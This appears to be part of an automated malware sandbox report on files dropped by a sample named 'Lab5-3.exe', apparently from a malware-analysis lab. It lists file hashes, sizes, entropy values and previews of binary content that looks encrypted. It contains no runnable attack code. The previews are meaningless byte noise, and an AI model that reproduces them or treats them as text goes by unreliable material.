                                                                                                          Preview:M...D.FC.k[._..|..9.g.L.....j/.....`\.N....IF`.VC|Wd....Mh..@..^.....H..>.......y.w....@O;.O.X`m.h.A....P...... ..)5.h..+........x.....R)..~2L....a[..#..U`....o.....i....c....8K.Z..A .Z..qZ.Q.5x..S.....Z.j.A.l......cP.B...A/@.1N.@..@@.^;..7...F............4..7..b,....{..~V.,i@~.s.%....P..r.1......KO..<....O.s.9..x(..\....<..;2...q....H..p.Gv.0.mU.e..B.X.;......e...i..d..s....0...0y.~}K.H.....G$F.d......v..~.Oy..d"...xm8...'..".y....*..^1/.D.F..|.t!..x...i...zAT........G`..)..x...]....kQ..20.@...'x..{......I..(......P...kg..E...l.....n...o.I...E.Y.f.w.qT.d.F3.v.t..`..I.<Z.c.m.........D...rj9[..f.Y.........Qf.}1.:O....g.R..?.&C.....8..B.%. 3...~...(.....L|T.h.._.4.....L...!r...>....5P..L..i!..7......C*.."<.w..'.[Db%...........}a=. ....v.7.$...K........|.a?_...{.[/!.jq.-a.2..Osp...../O.a..<.#x.O.<.s(JV^.@...)N...O.+(T.}......R.A.6.c..../.s.c..a..r@.....kq_..f...y.X../R.J.p..r.P.>.-W.T.O..mG..&.Ez.@...{...&$.........[_........Y.-....rb.q.%
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):13584
                                                                                                          Entropy (8bit):7.985233644754662
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:k1seXz6MLLy+IRASa2xY55JmK/CtBOa7tb:k1FzJLLcAS9jtBOa7Z
                                                                                                          MD5:5C59C92E404904B842D5CFBCEE0DAA39
                                                                                                          SHA1:B43B085CD248D0979233DD32519F39B27B6C9EF4
                                                                                                          SHA-256:0E94CC198E7B9879F73DAA551C8341E504F33D4647117CE42157B9EFF665AF4A
                                                                                                          SHA-512:B024C8F2632D95720582180F73CB7868917EFC9CAF332DDDEE4A4DEFC094CEE3A1F8E112DB5575E83E16F74C90D9F7735E034D96FF84FD311B6D3D088EB56EBE
                                                                                                          Malicious:false
                                                                                                          Preview:W..H.._`_.go}[=HT...+.`........i...8U.......T.T.&.NF..?b..f.|.p}....".%|.@..&-.......>.E../.[...>h.%#s.N.._.B......,.).n...6j........*,m.$.#l....[.~?..p..lN.."A...k:...Zv...#j..........8...^....2mu"....[.k;.._W@...N^B.v..r.K../.Z.vQn.. #{_.._..X...w|..Mp.y..X&..h.0.5.......q`yI.n..6P../?3.d."G.1.. ...3..>.....R<O.......Bi..:...z..wv.+..........nd....2...K.P..4*{..kX......8'$(jX...F..Q..,.CH..C.x.^.p..C.4-Z1.z.........W&....j...+.L.P...SM..O...............;`bK(...pS:.......{~EWR\/ri....e.w....Io...\..h...M...=..Me.......#<\._ .j.5Q......t.....R.....[.l<..2mYO...P.p?.;.= N.k'E.X....Y...;....`..........-....<.......G.....<#Y...f....A[...IJ2........(L...K=u.....U..@..m..|/.L.S..f...A/D..-.{.._'..*F..AI.....l.L.bE...(,....S...4?hy..?Z.....{..N1....?l...+A.-...`...r.o!..N.....Q.......2.Wf.Rb.b....D...P#."crr.....}.}..^+.........!T.=..m!.I.?....D...K3..%.<Q..A........$...1....lQ....X....eO."}Fsm.......X#...M.H...kp+.g.@..%6..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14320
                                                                                                          Entropy (8bit):7.985525694928323
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:PKsUkWHtIuruRrBK6t4kpzXs1U8+R7qb13wRatb:PlUkkCckekJc1U8+a13wRaZ
                                                                                                          MD5:E85C03E0220AE33F52C13120E7282F95
                                                                                                          SHA1:591862C6CEA14DC6EE988687531C8ABD1D68A825
                                                                                                          SHA-256:FCCA1FD40E15D3E46AB3B6470B71E602AB810A55A28743027BF0F4476AB04E51
                                                                                                          SHA-512:05E5AAE4FC868EA323145AAD050CB0882BAF3EA16C673A7F97BB350321F969430E433DB8648DF0E0773376E995664F72961CF55110C25DF3685B0042BEC79C0C
                                                                                                          Malicious:false
                                                                                                          Preview:A...|.(e....X.~..........B<..B..i.a..?I.,^..+......._.a.~....nH+.D]."..&]....E....f..19NI.>.2.Q....:.k".b...~...H*..+*6....\..oM.z..H....X....^W.IU.F.c....].dSG.;&K..Q.Q6..77.......=.T..P....x..W.4..G.....!!.Y..P..?U..Ub..".....2..Q.Y......^].&....C..:h.)R{`{:}(D.@.'d..K.;d>.F.)S.$-eIjyS.......x.`.A..d...?D0oS....d>.<j..4...{..i2`pb...>.%..X..5.N.........-.X..V>&.yK5.dz.....9;cn.....s..`--!....!.....u.S..'...Q.+T?..c.|&.....>.P.<.%=e1#..}|;|:X.u..Z...K.^.....q|..EG\....3..H,q.C...3>,-9{ ...S.w3(.jq.{.k,._$...8....#..}...2..Hv..!W.t...s>-.}.H?B.+.e.K{..Q.1..*.98rn.....Rd.R.R..-3F.F...t.-..!.6.9.h...u......X[QSj....F..V..e..wL.'.t...m..mH.Uy.le.T....oWP`jz........E.s..Me5{/.q....^......kh7...M...u..d....-|.......Yh..\=....,.8[......5....(....9.1.......5...Z..b..Q.T...'.....rm..._...\...S:....8......PS.O~Q.X.#...I........"Y..8......f.,#.MzLiu.`.J..1....9...?...%....).h..<......W...........m.N:.B....Q.YSG193jm....i....k.Zk.......p..A0{
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.921586490920097
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:KVe1yBKi908CSW1aWBTSAHfUTid3hBaUoSGFcmeykEdEElU92i:ekV6hCSfUSHGx0uKeY2ElUJ
                                                                                                          MD5:DAD7407FD06D940A8EAE2AA4E5BA40C4
                                                                                                          SHA1:E2D65C8491B6015DD48B46B2BA9244B0AA0585E3
                                                                                                          SHA-256:734C56AEB213E5BCCF8DEAA7BAA8462FC282201EE23EBA8CFD057BE5CD0D11E6
                                                                                                          SHA-512:8F31AFD85FB489AEE7F45CD18483AB1DE97621EB4BCD928727995978775CF6986B74D3E968905CEE181A2E5ACF319C9959716627CECAAB348532D10665C14116
                                                                                                          Malicious:false
                                                                                                          Preview:9...v.R$..}.j#.3.:.Z...).....F.....I......w.....N..~..#H4QN:]C..<m..e....._sp..;...O..Z.H?.bN|.U-...0.h...q..9..<0... ..<...H.<-php...8.c,.8.;.....sd. PSs...'~...<.$.<8..z..U`.s.[.OG....8.a(O..../....m..CD.`.A..#',.e|(........E^.G..n.....\@bJ-.k.>R..Vp.6...`.w.....U1..P'hg...Q.{....+..e..:R.&.M.(b.g...N.}}.%X.&Ms...iUM{>..OQA!....v.....b..3v,....T\..~.y.^..F.9.......J.......[....o.N....P.........FW{.....=......c.&...H.Js.'0^.M.&H.,.|..z..5^..-|...5K0.A...*f`..w94......3.Q..r..rx.=..m...2Q`).!..".".N<vZ..w.\.JF.......,z..v<..,.?...9.W.H....9D...../@k,.ob.y.{.......(.-..Nm...tJ...;$.%.J8...1..4.:.....X..E..7.<.H...{.A..=H.'..g{.h'.;cE.x.............E..A...U..jS...R.."E...#..XW.qq}..V^.......z.Nf.....o2....[o.r.....X.y.(...7..:..9..5}..k....U@....N..1...1...m.....&[...e}5.... P...ic.u.fo..|`B1..d..Ia.....7.....w..<...-z...HD'.W...wX{./..].?y.@Q....6"..C..af<=l.EQ.....P....m.re.W..=...^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2080
                                                                                                          Entropy (8bit):7.917140351110028
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:VZOG/OQrYgCYBunNa35I/fHfUTid3hBaUoSGFcmeykEdEElU92i:VZOG/3JunNE5KkGx0uKeY2ElUJ
                                                                                                          MD5:0812D74B13B845CA1C84DE791338BEA1
                                                                                                          SHA1:76E88955860708B3067AEA16D590BC5D4A0502B5
                                                                                                          SHA-256:67A216D3D852F68EBB59EAE8B72516405DF31E9E3D72B8518517116AFD6DC049
                                                                                                          SHA-512:C4715334D6A2D7A3D71761845DC93F4FF34E9FAD7E38154AFFBD49D32146E9717BC30283852DE3A83F8F327F4C0F8E1E201F4D004BD4F018D5534DB1D2DA523E
                                                                                                          Malicious:false
                                                                                                          Preview:;'......."f..H...*C.....@...=.`.......u^f....B.g..}...og..~..hd.c.2_c.k.h........"b.*./v.L)7.....9w...0.#...Bl.......X..d...M3...u....M..a.,o:..wM|.......U.Z..;ls...v...Z.....W%....e=......7ss`:.B......y.......@QKt..WRw....".YWP.v...G..(./...r...X.=.yuz..sh..<...5.l.a.YB......v...Gm..D..]|.x..|.;.F.6..?6......@h.I.......X..%..`...Q...[..eX.U..._2.....{N~"9...CR.?.!`A..,.m....7...2..v.sC..-'..Z...<..L..N$......bS..Q-k....y'.....j...FQ..:..D.N=.p(.....A$..k..... ^..@.w..O.....u..D<W..A..a.'.c|.?." .h.@........c>...=...yn....r.].(h.........R.q.\..i.I.6.Pm(....)).^.X...{x....N..)....U...vA..UKr...D...D..[..+1..K.[..N1...Gm&...)..M..u.@.2........O...'5.."..-.tm8..x=W...._....X0f@|A.....e.PVw....~.M...W3...O....>-..j..Q.............E ...'G!...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8352
                                                                                                          Entropy (8bit):7.978168562640644
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:xBz3khkaL2W0DdKhPU3oE1vVB1TtC8S00Cb:x934odK1UrBFtb
                                                                                                          MD5:B4A8924CAE18D26CAF7B3BAF8B63A1A5
                                                                                                          SHA1:0B80B38B9BF6DBF1EA70B046ABB40A98FA89280F
                                                                                                          SHA-256:B7C5D786CFCAAE6231E45970AFA3B66EDB1B6F8B3526D113016BD9284A746131
                                                                                                          SHA-512:6D660BC87DA4C2758D2AE06B4651C65C0D3C635EB8F00F8BECD00A8F9B400FF6E65AEFBA9F6EB6577F78C41879CD2649238E915350DC8FFDE877A4FFC78F99EB
                                                                                                          Malicious:false
                                                                                                          Preview:Y....`.}...#..}...&.-..B..C..0.&...TE.....eC.u....1qi^.....S.Z.*u...D...*...vR..hP.].@.7.......C..V.m/yyP.KU.#.d......."..`D.t...\...&...-.......G...=...i..,....X.T.Pg.Y.R............k213.\...Q.[k.d.u..r....d.;~-hZa>....N-~.&.....\.|.... .p..L....>..i.P.4i..j.uH.`<.Sz.o.\.1E6.29.=.c..+.....W..K`.e=..j::...@..IDd..gQ..~R.&F..S\.Q.......;.....>....w...t..A.[..D@.....h4e6...i....IZE;.%..../....Cn1....r6.ys.-Y5..r.T..;j.K/.~..I1.>n.v...,..R..x.W8.. &.G#....n....Q.Od5..*.....]|.;D.,."...|.[p..}1..dS.T2S.2.....[-.NS.)..hs...V$N/....T?..^.c1..C.6"..x...2AbX._p._}.h..)..kd"...6...\*H..9Tz.....4..!..........[.Q......T.q...z.W....8.m..Q.`4..yD...a*..i...Ra....uG?.1.TW...v..S.....@..l.O.|..r>...Q....l..j..Zft..W.m....R~A....._1.m.}.%."..@......`0...N.F..5....s.=......@.fe ....{.M....1..$.....lp....L@.....py<..^.4.D<O.a.......:.8...4@.k|.... .ME.......O.W..JIV...~lI..+.....=t....Q..<.~..%6.0..(.+.@...:..i......4Um.....d),].9P....OD.y..........m.m....9
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16704
                                                                                                          Entropy (8bit):7.988322812988433
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:3y6VNBtIJR36Y8sgjhuEEzPf6V7lbzZabLS6ro+1Butb:3lkRKrpJQPfEZab+6ro+1BuZ
                                                                                                          MD5:9F8E1FD070C4895014207F813F1432FF
                                                                                                          SHA1:3E4F7FD13ECCFBB8A41BFD5F95B13CDA27EF00A8
                                                                                                          SHA-256:5F291ADD73D1C6693968F3B126281AA266D78E75956B4E9C3A887A51CD37F3EC
                                                                                                          SHA-512:88B9C2AC5ED29C161A50A88AC01D79187BB99900D54B3C82BDDCACDE22992BA25D886E7F48C138C2680FE9FA02AF4D6C45A6F9DCEF17FE1E2F2A0B45B483719B
                                                                                                          Malicious:false
                                                                                                          Preview:...,./.../..<#...`O........A..z{.J.m...k.y..}..I..N...ZE..,W''3......o..5w.8.SV......*..7..eH7!6o........].N/.M.....&^..v.g.^).K..,..M*XUO.'.8p.y.m.LP.}:...f.1`...-../..f...9rhz..m.<nB$rHf*,..Cf<......-..M...<....0..m.=.Ld..W.z.{.../u.....`.D:.`.;*.l6/.O..n.B.nra.t4..&..@f...OZdqv~...rL.d.9...!o8./+D0.;...|..g..#Z: .Hb.*.fqTE.;.6o..q.Y.[.9....-......b...(...%W.....<0LSB.y.8........P...~."...7&T...3.e....|..4...'..\......T.6....O.3.yx.@.:.".2i.h~.s,.....@.."p.(...@.SL6..B85..L"......$}...UF....8C....|f-.I..X...?..I-.}vr.v.v........H..p...*=...b:_..dcH...n_!K#...K.+_........a...5..2.m..^...z...4........N..m.Ub.D .h.K...]d...m..on...B..!N......5.Q7.y..z..u..'....:$,.6X.F.....ap`....jgQJ....e.x.P.,nQ_K.V.F[YW.=...M.#.tm...A..G..]...v.>.D.....x..t..}...i..S...W...k....(>B...>..j..u.Oid....x.U..d.. j`X....iJ..g'.V.K..4..OK...-u..@.|..d....s5z9.p.'...%.....X. .vD..H.P..U.m.e.7.F.A.=.L.T...%..F.1....TtG.tR.`zq.d..nj...E._.U.5...".&^.M..ry....."......o
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8272
                                                                                                          Entropy (8bit):7.972803666301346
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:mypwk1s502DwTRXM26nAlj+SwA20Nyy3etEYo3+3LCCxaP5bTfrgn9U8YT5Cw3WT:Tp5NXF6nEz2mDM9xG5bHgirTgDNr0Cb
                                                                                                          MD5:46BA2CC7BA290C377857C8268A470600
                                                                                                          SHA1:B1DF910A56B60BD77021987E20D7A6A517C905DE
                                                                                                          SHA-256:9A8900DF4216418039ABBA237E36A48988D61136D44C709393BCD9C9AB5F0DFA
                                                                                                          SHA-512:47C364FC93256E745BA22C42B25F2751F79735A454DA0EC9770AE65A84D9BEF02CA073356718221757D2795559C065D9E19E31A290B2DC05405AA5C12465DA8F
                                                                                                          Malicious:false
                                                                                                          Preview:.8....AH$.]'..{5LH..>.W..\.Xr{a..j.OjA\.y...d._..d?!.{.@r.{=...b%..S..Oy..V.{4.I7.g.P6...../.{z.\..9B8m.O.^..|........&..p..u.I..fV....1|.Ry.K.k..'i..x...d..O....1.N......C......`...I....M,..c...+...>.{......@..K...yk.B.7P..?P.u.?.T...&d..+.......PH....e....@..I..KF......T....t...>X...i:...Je....~|5N.'D.Xb.L}V........ ../...Y.......^._^X.\Oe..OA.T/.B6X...EHW..Q-......wG+..V/wL&i.H........s{.Ss...C..f...f.BcV/[ ^,...P=....+..1..'.Og.w.Q.v..%..o#.......T6......qI..Jv...,....6..|.v...".6.p.......P<..hp...i.XK.+.h_V.l...;...A....q.Tz$........ ...._........5I..P.<.....1.:.w.j.^..8.......{v...C.f...o...{.w_f.Q.BH.B%-.(..F..Y.+....gf@G.A(.8...C....Y..uk.....v..~%3GPQ&/_/.UI.t.... .X=...Q<....0.%6.qG...W.qr....w.9..A...SrL64.R..........:...Ya.%I.......?.<M.3...!..%*).nW.. ..CR>.............HH.u.m...^H...3.yh.;......y..._\.].Bs...r ...J...~..j..=..c5..%I.v.Ihc<.......X\..._+&.~..d.;..z.d......j.=.v.._.'o..]...Tar..Y..6.....@.O.b..XftU....Gzgl.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18000
                                                                                                          Entropy (8bit):7.99052948791526
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:q9ie1TqdGHobIqb2uNEGRoSL5ZR+02eUhscb776A2/tb:q93ThoI49NLFJ+/ehcb12/Z
                                                                                                          MD5:908BC9B3595EADA345661115DB5FF4F9
                                                                                                          SHA1:788392B8E69FF6CFCA27A4BA4CD5A6565B2F9FCC
                                                                                                          SHA-256:86121F23C3CBF178C7E6646C0D4FED8121BBD9B96C6237764CDEBD3397C2E27B
                                                                                                          SHA-512:9AE2CE927209B67F53D962AC22597855FBD67C0D62DE7A53A9BD1417C31578B9407DF26A35D6508B5DAA6007EBC10EA0945E3B1FB0D5B8A30275127B9C30CE3C
                                                                                                          Malicious:true
                                                                                                          Preview:h.-A9...j._..f1.>N.a....M.QI.^*w...z...!...B.0...U..`~O%......VbR.*oi.ev.......t&...7Hhle..TjY'.7EP.&.e...]..'..Xt.B .$... c>G=...6.;....O.P.@f...v'd...q...+K...Pl.......r...N.M..#...<v.e.M.!./...~F.TC.S...e.#....g.....T).@I.`.Y>&......F../.H..*.........c.........V.$.Wos...B .;..)+..ss...I..AA.AF.T..bP3G..<....f^4.."X..c.YB.?N.w........H...._.`..A...Y.F..Z.*Tt..r..S.%..I4N...sa..r.R..;....A%...o@..[.g....`....g..9.pE2.jc.....YgC.3..=D}k....U..7.+.(B...v-cf.c.&..p..|..&..=.Bh.R"H4.Q<.|..'....{.#lkm..5h..~..v3(v\..|.3.....i.......K..qh...{...........[LB`.Wd.@....%4]....[.nK.W.U.x.oU2i..6.az>..>[.k...}........&.n..zK4.....D.6:..t....H.......m.O_b..W....n..+..0. ..3..[..}O.Y.....pH..;("k..y.$F6..+e...t..-..#s{...K...."..l=E#k.....br...7.0.J\......U..."\b... ....Zp..z.p.g.c.......JE.(..Eb....]Tm..A)SN...M.v$F.........Z.%.d.......%.N..T...&..jv..VW.s.&4.k.9}l...&7..OR#,d..~i.~..\6.u.......DnF.<.p.Y..@..{L..}./....L.J.Pd....~..i..0H.3V4.e.'m.k%..:G
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1904
                                                                                                          Entropy (8bit):7.897222725257056
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Z4oH/1NedHfUTid3hBaUoSGFcmeykEdEElU92i:Z4oHdY2Gx0uKeY2ElUJ
                                                                                                          MD5:BA51E733D00ABA93360591F5AC42E52F
                                                                                                          SHA1:F345E8FDF49A2B6BB9F5378ED388CB2F4A5FB042
                                                                                                          SHA-256:2C2EBA976DBD775FFBC39807DED891011A0E265738CABB5D38E403DE26142A8B
                                                                                                          SHA-512:1585EE17F55EDFEB41386C212FED03D9ADF31992D84D715E96FDDF565DFE21A93A163CCBC7461ED718630DC8FA6C1829F8BA7D036123596B9590F44BBE63381A
                                                                                                          Malicious:false
                                                                                                          Preview:..I..H.]..j.6../..0...|VXE.:B...(9=.&%5..y.J.r_.~.#1.<.......$...s....~....1*...P.~d.(..6.\.:..}H.y....n..@'..i..T..Aq/..,.-.'.....D..]..}9|/...P.."($v....\.........3XKG0*.~.1}..].....s.).........h:4Q2.X......O..%.y.L..M .vgp..U.Dn....U..$...ji......W9.b..'9.4...7....4...s.p..(1e.x.G....Y. >o..!9:.\v._..r3"...[......[....!b.............s.........Oo.....b)>3B.,I9.....Se....U.Ttf..=.L.5s?.A.q....@."W....P45<....w.!.p.}2....L.....a~"K.d.(....V.K.fa.i....n.}3=..!..Y....fXT..V.?...2.N.G......O..m..'....C.f9...eI.....+.V.P......=...e.....GWC....$..y.ODj.d;...S.02.Y...P..@.X.34".R`...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:SysEx File - Fostex
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2160
                                                                                                          Entropy (8bit):7.923118760657952
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lTKBtHFwBfiV5X7HfUTid3hBaUoSGFcmeykEdEElU92i:uryflGx0uKeY2ElUJ
                                                                                                          MD5:34227A4DD24D66BC26C9BE04403F4C50
                                                                                                          SHA1:35B49A0D64A5ED9D4A60E4F674F9AE52A64C8256
                                                                                                          SHA-256:353338FAB45D5E00D5D07AD349F2CA61F3AFF8A712687B30DF3652991E2F2A24
                                                                                                          SHA-512:062BE4EEBA9A16F072FF019C38E2D73EF76306735B2C254A18348D43D151D47A8700607E4249E6CC8449E65E4B960ED106945DD25F28671152A3964D80A4A0CC
                                                                                                          Malicious:false
                                                                                                          Preview:.Q...e2...uF.?..z.]...c...8'.m....*m.._.)...l1bF.r.g&....Nc.9..=........oP>Y.R..`.Y%0...~....o....+..z.KG...\.....%#.~~.U..~..!.uV..J..hV...B..=..FX...n...[..69.....LC+.".w.rJ.Aq...5#..........se.N.hy.@c...^JU.......4..ay....>.j.xv..V.+.G~...p..?..p.....'.......7.q.lG....%C..Ij.C..Y.(...v..I.....-.j...^.V..r......@.z.s....e...ipI...NKe7..l...W...AF..L..EZ...'V...+w..zD.'..y.0....V.....D.8..(...r.3.W.;JP..q..(....C.0.....Ub..s>6f..8.`.........0.U?.....;,.;....N....Ew....{......F&t.l&@..W.[.....~../..2.u.R.W..VV.M8N.R...M.......Y.......@..V[..a4E..dD1Z.:..kx.q4zGa.......@..................[....ZIR8+"A$..?.{?.m..w..q...K....K..s._.ow.6.?4....j.....W ]..."c........3j..G..b!j...Mt.S>...O.*[..L.Z.b3....k..1.O..CfB7!...#.#*..-^v...B....l.i.@P.dZ~v.&....)....%..R..>..j....;.d&.W...!@...v..O.....+.?.m.Q.uF.Y.]...`.@..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1840
                                                                                                          Entropy (8bit):7.895926770677645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:nW9nkNlAniDHfUTid3hBaUoSGFcmeykEdEElU92i:W9nHRGx0uKeY2ElUJ
                                                                                                          MD5:7FEDEDB1CF074F7A66E09D66D3B9068F
                                                                                                          SHA1:7F52C1E2854077BCDDF8273AE7F2FEB7D21864F6
                                                                                                          SHA-256:47F67AE18F5A48122AADE3659754848CBCEF13BB21347A27654C350B1E6A0825
                                                                                                          SHA-512:E652FA8804649AD07AA298561A7F039DA3748B32165A5D00B280239F836ED9C0480FFC30ECB808ED7E9FDE06A505CA49CBBCBF5BB77CE13D7AE373D08C59FCAB
                                                                                                          Malicious:false
                                                                                                          Preview:.T...NQ5.wE....9.&.S.Nm=.s%.....$.*y..^...&.y...... ...(*.4#w.%=m...!z.c..Ny#....a...Q.y...5X......*+..:..>e..}..."k.E+...5.e.1.dT.....}.t./mo9.2..V...0.....Q_."B.ZaM.g_e.....g.D..s.&0*.nO..._......@.6.$D....../..\.I8...5..F... ..,..............^.}0.L=p.l.K#.,....`.o.A.|{X*X.R.iyL..-.Y.,.3,2/I/....hI...]...G..tu].E!..7..a..72......2.;.#....W.. .U....a...d.q.58.A;.K.....T..(....d...a.A............8^@...;C.e%...$.,z.l[I..yb.l.EJ*...<o.......?}..#g.......m..0H.$..:.h...e<~.W...-...L....x.P/.H........".1.X..9(s.o..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2128
                                                                                                          Entropy (8bit):7.920551739016012
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:c+YfGmN4IBbhXHfUTid3hBaUoSGFcmeykEdEElU92i:cbfDN4BGx0uKeY2ElUJ
                                                                                                          MD5:07CD15D7378B4037E094C7D78F214054
                                                                                                          SHA1:0B1A58FC30893775B9571EE8F900FD7A8237AFB6
                                                                                                          SHA-256:055E7216159A8B3E56FBC73B1027C5967F2CE1E5159C1A1E334D3342AD9B7F59
                                                                                                          SHA-512:8A7C7653C28D109B6194158ED51AF0AA6BCD942E2BFB0BA7EB3BF3580371359A26F8FD2678A5C111371EEC410F841C12A2F2938BCC98C1F223579CCA166113C1
                                                                                                          Malicious:false
                                                                                                          Preview:...%..w:...k..8D.#..H...&"...0.. $......4..@...v..B.Ha..T..Yz..:..y}~.<K...R...G.......Hu.L...]-.n...^.0.*..G....?6..X.S..!.,..<.h.c...cg...c..z.'.M5'o.....6...Q.6......?;..5..41....f.J......'.A..*....&3.0$.....$*.E...4.S..cq...e......c.^.>!w..d..f..k...+.....@LX....%.R3AK..L.5i..F....wf..r^..]P{..b.pll.....?....3....j..y....U.........r..ey..>0.L...n...i.r.iw.....P...(....r..t4...D..{..-.Q..&*Mwb8..Fl...3?..].....3c.........<.A...*(.og.o@x...dk..i.4.F.6s.M.x..i..2qUC.&h*.@..Al..F.......L..w.,.j.p.8[9T...m.v...E.\.e-.J.m......'.]....ou.h.....U1.\.w..........._...0E.w."MU.......Od?.A.._.c..#~.m'..h....b.....7Q.z&..$.>.w.q.9_2.AL..........J~S).L.L.z.lg.2.#?.c.._...."h..Ic.~.Y....?W.$F...`.$.H..&.6.L...CS"a....RG.'.OZ.Uk{.Gn6s.Z#.*..K......Je.K..Z..C......5kC..?$_.9.U.x.Awb.P...H.j..a.j...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2576
                                                                                                          Entropy (8bit):7.921883748967374
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:beLYXFH9NV3JW5A6Q6Kl9Giy3OF1HfUTid3hBaUoSGFcmeykEdEElU92i:b5XzJW2DLGZ+FOGx0uKeY2ElUJ
                                                                                                          MD5:27F92C1B519F1D49E7C9737B3D178355
                                                                                                          SHA1:B025EC42DC9C7FB8A61B5431DC41557663D0FE19
                                                                                                          SHA-256:9EBE1E141A0C5494A6E293470BEE077B48C93DD8616DEBE6D48304EE4E7A89FB
                                                                                                          SHA-512:6D289E05B1D8E16609A3948E64E7197636E07A988D9E077A05444015CC8EBD90B63150B11F9AA4F64F584DF826BEE6605C89CEE56C06298620D781C44BF1038E
                                                                                                          Malicious:false
                                                                                                          Preview:A./....2..&...7.yc..I...[... .2-.....^v..:c^8.:9.nW.m.{....+..E..&..8....Q..*.h>..U.....J..m...l...H2w.M.w..Z..V.D....Lt.p..DW..T.........I.t....2+.!.....f"...%...!`.4..<0.[Dl....(.,;.=.....v..v(R6W't~ .\0..._X.|..n...M7z.Zf..BJ......4=......,H.....*yPE`...E..c,..O.F........H9n..'...I...#.0.... ...5......p..<h.Q_yb.^...Tj..}.`AX...o.`l3...o......<a.w/,.~.........Kh).~a&...9.E..!..X|zF...a|.=.,\...[.O..o/. ....&.5-....C.uea..Y...Y....^.J+.^+..'..l.,L..V...^.V......8..n@......}.H....I,'.2......I.4..R....g...5.DC.p.J.ex.B.cOBo..[..'(%..GV......Ri..b....xs1....;#.L.......U..........7(..G.i..NMHi.E.1.tat..0....6}...*%h..g.z.l.6.!.@.qI.WOJ.........)o..C..m...M.xC..O..HL...NQ.1;N..*...y..SH......-eK....C.... Ke.-...;.nW..Z|...2|.D.?.U!..&...."..D....$.\...2n.0......~c....b4.[......|...C.p....jL......z.s.].....2...E.AM.:<.4...L..C.*`.0.z..../.'...Q.[....t....R.G.qG5.yX..).br.L[.j>...f....>.<t.9..;.....w.:.7$......6H....P0.H.Q^.Q&.....u.TE....?.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3280
                                                                                                          Entropy (8bit):7.942794458756423
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:t27ef2xzMZ6vwcZi8Ilz+q794GLAxYHfUTid3hBaUoSGFcmeykEdEElU92i:6PzMZCwzrlnViGx0uKeY2ElUJ
